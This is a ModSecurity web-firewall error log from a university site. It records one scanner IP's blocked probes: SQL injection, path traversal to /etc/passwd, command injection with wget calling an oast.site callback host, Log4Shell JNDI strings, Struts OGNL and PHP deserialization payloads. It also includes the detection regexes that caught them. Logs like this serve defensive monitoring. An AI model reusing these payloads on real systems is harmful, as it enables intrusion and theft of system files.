"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATPtR0AAAAM"]
[Tue Aug 29 11:34:52.319941 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAAT2JQcAAAAz"]
[Tue Aug 29 11:34:52.341806 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASHh80AAAAD"]
[Tue Aug 29 11:34:53.341448 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUdm4AAAABS"]
[Tue Aug 29 11:34:53.347745 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAATOA@EAAAAH"]
[Tue Aug 29 11:34:53.374144 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgkek5ce6szc37n.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATPtSEAAAAM"]
[Tue Aug 29 11:34:55.347744 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATPtSUAAAAM"]
[Tue Aug 29 11:34:56.317648 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUNak0AAABF"]
[Tue Aug 29 11:34:56.337037 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAASPDMwAAAAS"]
[Tue Aug 29 11:34:56.347585 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAVJXkEAAAAA"]
[Tue Aug 29 11:34:57.310846 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUGY-wAAAA@"]
[Tue Aug 29 11:34:57.312436 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAATxvYoAAAAw"]
[Tue Aug 29 11:34:57.370643 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAASHh9AAAAAD"]
[Tue Aug 29 11:34:58.308637 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAASPDM8AAAAS"]
[Tue Aug 29 11:34:59.363873 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAUbg1QAAABQ"]
[Tue Aug 29 11:35:01.303212 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATUxRkAAAAW"]
[Tue Aug 29 11:35:02.306556 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAATPtS4AAAAM"]
[Tue Aug 29 11:35:02.327747 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATPtS8AAAAM"]
[Tue Aug 29 11:35:03.318100 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAATXLMkAAAAb"]
[Tue Aug 29 11:35:03.338628 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUQ7skAAABH"]
[Tue Aug 29 11:35:03.344943 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUdm4kAAABS"]
[Tue Aug 29 11:35:04.316973 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlg51ur1bk61bai9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAARdiTcAAAAK"]
[Tue Aug 29 11:35:04.318248 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUTiYwAAABJ"]
[Tue Aug 29 11:35:05.300756 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgmx13zop1qtb76.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAATUxSAAAAAW"]
[Tue Aug 29 11:35:06.339737 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgm3fbhw9bntu1k.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgm3fbhw9bntu1k.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUQ7s4AAABH"]
[Tue Aug 29 11:35:07.310904 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAATUxSQAAAAW"]
[Tue Aug 29 11:35:07.343647 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAVK0IAAAAAB"]
[Tue Aug 29 11:35:08.360014 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAUZcGoAAABO"]
[Tue Aug 29 11:35:09.334601 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAASPDN0AAAAS"]
[Tue Aug 29 11:35:10.337998 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUQ7tUAAABH"]
[Tue Aug 29 11:35:10.351378 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAT9PQIAAAA1"]
[Tue Aug 29 11:35:10.379545 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATPtTkAAAAM"]
